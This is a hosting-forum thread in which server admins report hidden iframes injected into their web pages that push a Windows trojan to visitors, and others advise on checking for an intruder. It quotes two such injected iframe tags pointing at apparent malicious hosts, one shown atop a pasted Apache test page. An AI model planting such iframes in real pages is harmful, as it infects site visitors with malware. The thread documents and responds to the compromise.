trojan on the server?!

[deltaned]

Hi, is it possible on my redhat 7.3 machine there is an trojan active?
I spoke to an customer who told me there is an: trojan.noupdate.b
It will open a new window with the url: c.coolchader.com
It is most of the time the customer see this at the webmail selection.

Where can I check this ore find the trojan?

 

[ProWebUK]

quote from symantec:

Trojan.Noupdate.B is a Trojan horse that attempts to prevent users from updating their computer with the latest Microsoft Windows patches and antivirus updates.

affected systems: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP

Ill assume you only have 1 person with this problem?

Chris

 

[deltaned]

there are 2 perones (ot this reseller) with the same problem
Virus files detected;
dlm.exe
reg32.exe

IE open a new window with the url;
dl.html
c.coolshader.com

So far I can find information it is an windows trojan and I can`t find anything on my server.

I`am right?

 

[ProWebUK]

Just come across this which explains it, both are part of each other it seems..

http://computercops.org/modules.php?name=Forums&file=viewtopic&p=134881

Certainly a windows issue though, not your system...

Chris

 

[deltaned]

Hi,

I see he is place a Iframe tag under every page: <IFRAME SRC="http://www.b00gle.com/fa/?d=get" WIDTH=1 HEIGHT=1></IFRAME>

 

[ProWebUK]

Its a windows trojan / spyware / dialer, although its on your system so ill assume you have had unauthorized users have access to your system somehow also..

Run chkrootkit and other similar apps to check your systems status, check your systems 'last' command to determine recent access to the system from users besides yourself also... you could check the date your /var/www/html/index.(index fille) was modified which may help you also.... have a look at your webmails source to check if if theres anything like the above code there

The main problem being, if its in your webmail and its in your systems main html its likely to be in a variety of other places also... and since its likely a cracker has gained access they could well have done more than simply adding bits of html, and its quite likely they have if they managed to gain access in the first place...

For your users (and probably yourself if you run windows) you will be wanting the following link for refernce:

http://computercops.org/modules.php?name=Forums&file=viewtopic&p=134881

Finally, the important thing with security, think before you fix... or you will make things far worse; basics first - lock down all external access (ssh/ telnet) besides your own IP lock down your firewall as tight as possible, check all running processes for anything unusual, check netstat to ensure there are no connections live besides standard http / ftp / mail /dns

Once you have done the above start doing system checks, use grep to check all users html for that code, check your /var/www/html files for it, phpmyadmin, uebimiau, squirrelmail etc

For the future you may also want to get something like TripWire (on your redhat disks for you!) which will notify you once the files are modified, a must for a situation like this

Good luck with it...

Chris

 

[nobaloney]

Chris,

I've read this thread three times and I can't see where it could affect his server? Everything I've found on it says it can only run on Windows systems.

I don't see how he could be affected or infected.

Jeff

 

[ProWebUK]

Its not that the system was 'infected' it seems that rather (as I said avove) someone has gained access to the system and placed the html code (posted above also) in some of the pages, thus causing clients and general internet users (using non updated versions of IE) to gain the trojan / virus / dialler.

Chris

 

[nobaloney]

Thanks for the clarification; I just didn't see that.

Jeff

 

[hammerfall]

BUG Panel Directadmin !!

http://www.directadmin.com/forum/showthread.php?t=19004&highlight=iframe

http://www.directadmin.com/forum/showthread.php?t=2786&highlight=iframe


hi i have a similar problem the problem is at the index of the ip exe: http://MYIP/ and sometines is there sometines is not so i did checked /var/www/html/index.html and nothing like it came up and nothing has been change recently and this si what i get <iframe src='http://www.17rxsf.com/' width=100 height=0>



but when i do F5 on my pc i see this code <iframe src='http://www.17rxsf.com/' width=100 height=0> on the webpage source but if i do F5 a couple of times more its no there anymore

<iframe src='http://www.17rxsf.com/' width=100 height=0>                                                                                                                                                                                                                                               <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
 <HEAD>
  <TITLE>Test Page for the SSL/TLS-aware Apache Installation on Web Site</TITLE>
  <STYLE TYPE="text/css">
  H1 {
      font-weight: bold;
      font-size: 18pt;
      line-height: 18pt;
      font-family: arial,helvetica;
      font-variant: normal;
      font-style: normal;
  }
  BODY {
      color: black;
      background-color: white;
      background-image: url(manual/images/feather.jpg);
      background-repeat: no-repeat;
  }
  </STYLE>
 </HEAD>
<!-- Background white, links blue (unvisited), navy (visited), red (active) -->
 <BODY
  BGCOLOR="#FFFFFF"
  TEXT="#000000"
  LINK="#0000FF"
  VLINK="#0000FF"
  ALINK="#FF0000"
 >
  <BLOCKQUOTE>
  <BLOCKQUOTE>
  <BR>
  <H1>
  Hey, it worked <I>!</I><BR>
  The SSL/TLS-aware Apache webserver was<BR>
  successfully installed on this website.
  </H1>
  <P>
  If you can see this page, then the people who own this website have just
  installed the <A HREF="http://www.apache.org/">Apache Web server</A>
  software and the <A HREF="http://www.modssl.org/">Apache
  Interface to OpenSSL (mod_ssl)</A> successfully.  They now have to add
  content to this directory and replace this placeholder page, or else point
  the server at their real content.
  </P>
  <BLOCKQUOTE>
   <STRONG>ATTENTION!</STRONG><BR>
   If you are seeing this page instead of the site you expected, please
   <STRONG>contact the administrator of the site involved.</STRONG>
   (Try sending mail to <SAMP><webmaster@<EM>domain</EM>></SAMP>.)
   Although this site is
   running the Apache software it almost certainly has no other connection
   to the Apache Group, so please do not send mail about this site or its
   contents to the Apache authors.  If you do, your message will be
   <STRONG>ignored</STRONG>.
  </BLOCKQUOTE>
  <P>
  The Apache online
  <A
   HREF="manual/index.html"
  >documentation</A>
  has been included with this distribution.<BR>
  Especially also read the 
  <A
   HREF="manual/mod/mod_ssl/"
  >mod_ssl User Manual</A>
  carefully.
  </P>
  <P>
  Your are allowed to use the images below on your SSL-aware Apache Web server.<BR>
  Thanks for using Apache, mod_ssl and OpenSSL!
  </P>
  <P>
  <DIV ALIGN="CENTER">
   <A HREF="http://www.apache.org/"
   ><IMG SRC="manual/images/apache_pb.gif" ALT="Apache Webserver" BORDER=0></A>
    
   <A HREF="http://www.modssl.org/"
   ><IMG SRC="manual/images/mod_ssl_sb.gif" ALT="mod_ssl Interface" BORDER=0></A>
    
   <A HREF="http://www.openssl.org/"
   ><IMG SRC="manual/images/openssl_ics.gif" ALT="OpenSSL Toolkit" BORDER=0></A>
  </DIV>
  </BLOCKQUOTE>
  </BLOCKQUOTE>
 </BODY>
</HTML>

 

[nobaloney]

So it's not a bug after all. You've been hacked.

This post doesn't require it's own thread; I've merged it with the second of the two threads you've included as example. I don't see where this has anything to do with DirectAdmin. Am I missing something?

Jeff